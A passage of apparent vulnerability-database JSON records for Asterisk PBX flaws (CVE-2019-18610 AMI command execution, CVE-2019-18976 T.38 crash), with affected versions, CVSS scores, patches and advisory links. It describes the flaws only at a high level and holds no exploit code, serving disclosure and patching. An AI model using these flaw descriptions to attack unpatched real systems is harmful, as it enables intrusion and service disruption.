"trust": 0.8,
"url": "https://web.archive.org/web/20131208091355/http://securityadvisories.dlink.com/security/publication.aspx?name=sap10005"
},
{
"trust": 0.6,
"url": "https://seclists.org/fulldisclosure/2019/nov/18"
},
{
"trust": 0.6,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-008.html"
},
{
"trust": 0.6,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-007.html"
},
{
"trust": 0.6,
"url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html second message url unavailable at time of publishing"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4526/"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/asterisk-information-disclosure-via-sip-peer-ip-address-change-30935"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4421/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/155434/asterisk-project-security-advisory-ast-2019-006.html"
},
{
"trust": 0.1,
"url": "http://downloads.digium.com/pub/security/ast-2019-006.html"
},
{
"trust": 0.1,
"url": "https://issues.asterisk.org/jira/browse/asterisk-28589"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-006-16.diff"
},
{
"trust": 0.1,
"url": "http://www.asterisk.org/security"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-006-13.diff"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-006-17.diff"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-006-13.21.diff"
},
{
"trust": 0.1,
"url": "http://downloads.digium.com/pub/security/ast-2019-006.pdf"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03059"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012588"
},
{
"db": "PACKETSTORM",
"id": "155434"
},
{
"db": "NVD",
"id": "CVE-2019-18790"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1291"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-03059"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012588"
},
{
"db": "PACKETSTORM",
"id": "155434"
},
{
"db": "NVD",
"id": "CVE-2019-18790"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1291"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-01-21T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-03059"
},
{
"date": "2019-12-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-012588"
},
{
"date": "2019-11-21T23:02:22",
"db": "PACKETSTORM",
"id": "155434"
},
{
"date": "2019-11-22T17:15:11.740000",
"db": "NVD",
"id": "CVE-2019-18790"
},
{
"date": "2019-11-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201911-1291"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-01-21T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-03059"
},
{
"date": "2019-12-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-012588"
},
{
"date": "2022-05-13T20:56:27.693000",
"db": "NVD",
"id": "CVE-2019-18790"
},
{
"date": "2022-04-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201911-1291"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201911-1291"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sangoma Asterisk and Certified Asterisk Vulnerabilities related to lack of authentication",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-012588"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201911-1291"
}
],
"trust": 0.6
}
}
VAR-201911-1169
Vulnerability from variot - Updated: 2023-12-18 12:27An issue was discovered in manager.c in Sangoma Asterisk through 13.x, 16.x, 17.x and Certified Asterisk 13.21 through 13.21-cert4. A remote authenticated Asterisk Manager Interface (AMI) user without system authorization could use a specially crafted Originate AMI request to execute arbitrary system commands. Refer to the vendor information and take appropriate measures. Sangoma Technologies Asterisk is an open source telephone exchange (PBX) system software. The software supports voice mail, multi-party voice conferencing, interactive voice response (IVR), and more.
Affected Versions
Product Release
Series
Asterisk Open Source 13.x All releases
Asterisk Open Source 16.x All releases
Asterisk Open Source 17.x All releases
Certified Asterisk 13.21 All releases
Corrected In
Product Release
Asterisk Open Source 13.29.2
Asterisk Open Source 16.6.2
Asterisk Open Source 17.0.1
Certified Asterisk 13.21-cert5
Patches
SVN URL Revision
http://downloads.asterisk.org/pub/security/AST-2019-007-13.diff Asterisk 13
http://downloads.asterisk.org/pub/security/AST-2019-007-16.diff Asterisk 16
http://downloads.asterisk.org/pub/security/AST-2019-007-17.diff Asterisk 17
http://downloads.asterisk.org/pub/security/AST-2019-007-13.21.diff Certified
Asterisk
13.21-cert5
Links https://issues.asterisk.org/jira/browse/ASTERISK-28580
Asterisk Project Security Advisories are posted at
http://www.asterisk.org/security
This document may be superseded by later versions; if so, the latest
version will be posted at
http://downloads.digium.com/pub/security/AST-2019-007.pdf and
http://downloads.digium.com/pub/security/AST-2019-007.html
Revision History
Date Editor Revisions Made
October 24, 2019 George Joseph Initial Revision
November 21, 2019 Ben Ford Added “Posted On” date
Asterisk Project Security Advisory - AST-2019-007
Copyright © 2019 Digium, Inc. All Rights Reserved.
Permission is hereby granted to distribute and publish this advisory in its original, unaltered form
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201911-1169",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "asterisk",
"scope": "gte",
"trust": 1.0,
"vendor": "digium",
"version": "13.0.0"
},
{
"model": "asterisk",
"scope": "lt",
"trust": 1.0,
"vendor": "digium",
"version": "17.0.1"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "digium",
"version": "13.21.0"
},
{
"model": "asterisk",
"scope": "gte",
"trust": 1.0,
"vendor": "digium",
"version": "17.0.0"
},
{
"model": "asterisk",
"scope": "gte",
"trust": 1.0,
"vendor": "digium",
"version": "16.0.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"model": "asterisk",
"scope": "lt",
"trust": 1.0,
"vendor": "digium",
"version": "16.6.2"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "8.0"
},
{
"model": "asterisk",
"scope": "lt",
"trust": 1.0,
"vendor": "digium",
"version": "13.29.2"
},
{
"model": "gnu/linux",
"scope": null,
"trust": 0.8,
"vendor": "debian",
"version": null
},
{
"model": "asterisk",
"scope": "lte",
"trust": 0.8,
"vendor": "digium",
"version": "13.x"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.8,
"vendor": "digium",
"version": "16.x"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.8,
"vendor": "digium",
"version": "17.x"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 0.8,
"vendor": "digium",
"version": "13.21 to 13.21-cert4"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 0.6,
"vendor": "sangoma",
"version": "\u003c=13.*"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 0.6,
"vendor": "sangoma",
"version": "\u003c=16.*"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 0.6,
"vendor": "sangoma",
"version": "\u003c=17.*"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 0.6,
"vendor": "sangoma",
"version": "13.21"
},
{
"model": "certified asterisk 13.21-cert4",
"scope": null,
"trust": 0.6,
"vendor": "sangoma",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03060"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012584"
},
{
"db": "NVD",
"id": "CVE-2019-18610"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert3:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:rc1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "13.29.2",
"versionStartIncluding": "13.0.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "16.6.2",
"versionStartIncluding": "16.0.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "17.0.1",
"versionStartIncluding": "17.0.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-18610"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "gjoseph",
"sources": [
{
"db": "PACKETSTORM",
"id": "155435"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1290"
}
],
"trust": 0.7
},
"cve": "CVE-2019-18610",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2019-18610",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CNVD-2020-03060",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-18610",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-18610",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2020-03060",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201911-1290",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03060"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012584"
},
{
"db": "NVD",
"id": "CVE-2019-18610"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1290"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered in manager.c in Sangoma Asterisk through 13.x, 16.x, 17.x and Certified Asterisk 13.21 through 13.21-cert4. A remote authenticated Asterisk Manager Interface (AMI) user without system authorization could use a specially crafted Originate AMI request to execute arbitrary system commands. Refer to the vendor information and take appropriate measures. Sangoma Technologies Asterisk is an open source telephone exchange (PBX) system software. The software supports voice mail, multi-party voice conferencing, interactive voice response (IVR), and more. \n\n Affected Versions \n Product Release \n Series \n Asterisk Open Source 13.x All releases \n Asterisk Open Source 16.x All releases \n Asterisk Open Source 17.x All releases \n Certified Asterisk 13.21 All releases \n\n Corrected In \n Product Release \n Asterisk Open Source 13.29.2 \n Asterisk Open Source 16.6.2 \n Asterisk Open Source 17.0.1 \n Certified Asterisk 13.21-cert5 \n\n Patches \n SVN URL Revision \n http://downloads.asterisk.org/pub/security/AST-2019-007-13.diff Asterisk 13 \n http://downloads.asterisk.org/pub/security/AST-2019-007-16.diff Asterisk 16 \n http://downloads.asterisk.org/pub/security/AST-2019-007-17.diff Asterisk 17 \n http://downloads.asterisk.org/pub/security/AST-2019-007-13.21.diff Certified \n Asterisk \n 13.21-cert5 \n\n Links https://issues.asterisk.org/jira/browse/ASTERISK-28580 \n\n Asterisk Project Security Advisories are posted at \n http://www.asterisk.org/security \n \n This document may be superseded by later versions; if so, the latest \n version will be posted at \n http://downloads.digium.com/pub/security/AST-2019-007.pdf and \n http://downloads.digium.com/pub/security/AST-2019-007.html \n\n Revision History\n Date Editor Revisions Made \n October 24, 2019 George Joseph Initial Revision \n November 21, 2019 Ben Ford Added \u201cPosted On\u201d date \n\n Asterisk Project Security Advisory - AST-2019-007\n Copyright \u00a9 2019 Digium, Inc. All Rights Reserved. \n Permission is hereby granted to distribute and publish this advisory in its\n original, unaltered form",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-18610"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012584"
},
{
"db": "CNVD",
"id": "CNVD-2020-03060"
},
{
"db": "PACKETSTORM",
"id": "155435"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-18610",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012584",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "155435",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2020-03060",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.4526",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.4421",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1290",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03060"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012584"
},
{
"db": "PACKETSTORM",
"id": "155435"
},
{
"db": "NVD",
"id": "CVE-2019-18610"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1290"
}
]
},
"id": "VAR-201911-1169",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03060"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03060"
}
]
},
"last_update_date": "2023-12-18T12:27:54.873000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisories",
"trust": 0.8,
"url": "https://www.asterisk.org/downloads/security-advisories"
},
{
"title": "AST-2019-007",
"trust": 0.8,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-007.html"
},
{
"title": "[SECURITY] [DLA 2017-1] asterisk security update",
"trust": 0.8,
"url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
},
{
"title": "Patch for Sangoma Technologies Asterisk and Sangoma Technologies Certified Asterisk Command Execution Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/196957"
},
{
"title": "Sangoma Technologies Asterisk and Sangoma Technologies Certified Asterisk Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=104055"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03060"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012584"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1290"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-862",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-012584"
},
{
"db": "NVD",
"id": "CVE-2019-18610"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-007.html"
},
{
"trust": 1.6,
"url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
},
{
"trust": 1.6,
"url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
},
{
"trust": 1.6,
"url": "https://www.asterisk.org/downloads/security-advisories"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18610"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-18610"
},
{
"trust": 0.6,
"url": "https://seclists.org/fulldisclosure/2019/nov/19"
},
{
"trust": 0.6,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-008.html"
},
{
"trust": 0.6,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-006.html"
},
{
"trust": 0.6,
"url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html second message url unavailable at time of publishing"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/asterisk-privilege-escalation-via-ami-originate-request-30936"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4526/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/155435/asterisk-project-security-advisory-ast-2019-007.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4421/"
},
{
"trust": 0.1,
"url": "http://downloads.digium.com/pub/security/ast-2019-007.pdf"
},
{
"trust": 0.1,
"url": "http://downloads.digium.com/pub/security/ast-2019-007.html"
},
{
"trust": 0.1,
"url": "http://www.asterisk.org/security"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-007-13.diff"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-007-17.diff"
},
{
"trust": 0.1,
"url": "https://issues.asterisk.org/jira/browse/asterisk-28580"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-007-16.diff"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-007-13.21.diff"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03060"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012584"
},
{
"db": "PACKETSTORM",
"id": "155435"
},
{
"db": "NVD",
"id": "CVE-2019-18610"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1290"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-03060"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012584"
},
{
"db": "PACKETSTORM",
"id": "155435"
},
{
"db": "NVD",
"id": "CVE-2019-18610"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1290"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-01-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-03060"
},
{
"date": "2019-12-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-012584"
},
{
"date": "2019-11-21T23:30:33",
"db": "PACKETSTORM",
"id": "155435"
},
{
"date": "2019-11-22T18:15:11.030000",
"db": "NVD",
"id": "CVE-2019-18610"
},
{
"date": "2019-11-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201911-1290"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-01-21T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-03060"
},
{
"date": "2019-12-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-012584"
},
{
"date": "2022-06-03T14:34:50.917000",
"db": "NVD",
"id": "CVE-2019-18610"
},
{
"date": "2022-04-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201911-1290"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "155435"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1290"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sangoma Asterisk and Certified Asterisk Vulnerabilities related to lack of authentication",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-012584"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201911-1290"
}
],
"trust": 0.6
}
}
VAR-201911-1367
Vulnerability from variot - Updated: 2023-12-18 12:27An issue was discovered in res_pjsip_t38.c in Sangoma Asterisk through 13.x and Certified Asterisk through 13.21-x. If it receives a re-invite initiating T.38 faxing and has a port of 0 and no c line in the SDP, a NULL pointer dereference and crash will occur. This is different from CVE-2019-18940. This vulnerability CVE-CVE-2019-18940 Is a different vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Sangoma Technologies Asterisk is an open source telephone exchange (PBX) system software. The software supports voicemail, multi-party voice conferencing, interactive voice response (IVR), and more. The vulnerability originates from improper design or implementation during code development of a network system or product. An attacker could use this vulnerability to execute malicious code. Asterisk Project Security Advisory -
Product Asterisk
Summary Re-invite with T.38 and malformed SDP causes crash.
Nature of Advisory Remote Crash
Susceptibility Remote Authenticated Sessions
Severity Minor
Exploits Known No
Reported On November 07, 2019
Reported By Salah Ahmed
Posted On November 21, 2019
Last Updated On November 21, 2019
Advisory Contact bford AT sangoma DOT com
CVE Name CVE-2019-18976
Description If Asterisk receives a re-invite initiating T.38
faxing and has a port of 0 and no c line in the SDP, a
crash will occur.
Modules Affected res_pjsip_t38.c
Resolution If T.38 faxing is not needed, then the “t38_udptl”
configuration option in pjsip.conf can be set to “no” to
disable the functionality. This option automatically
defaults to “no” and would have to be manually turned on to
experience this crash.
If T.38 faxing is needed, then Asterisk should be upgraded
to a fixed version.
Affected Versions
Product Release
Series
Asterisk Open Source 13.x All versions
Certified Asterisk 13.21 All versions
Corrected In
Product Release
Asterisk Open Source 13.29.2
Certified Asterisk 13.21-cert5
Patches
SVN URL Revision
http://downloads.asterisk.org/pub/security/AST-2019-008-13.diff Asterisk 13
http://downloads.asterisk.org/pub/security/AST-2019-008-13.21.diff Certified
Asterisk
13.21-cert5
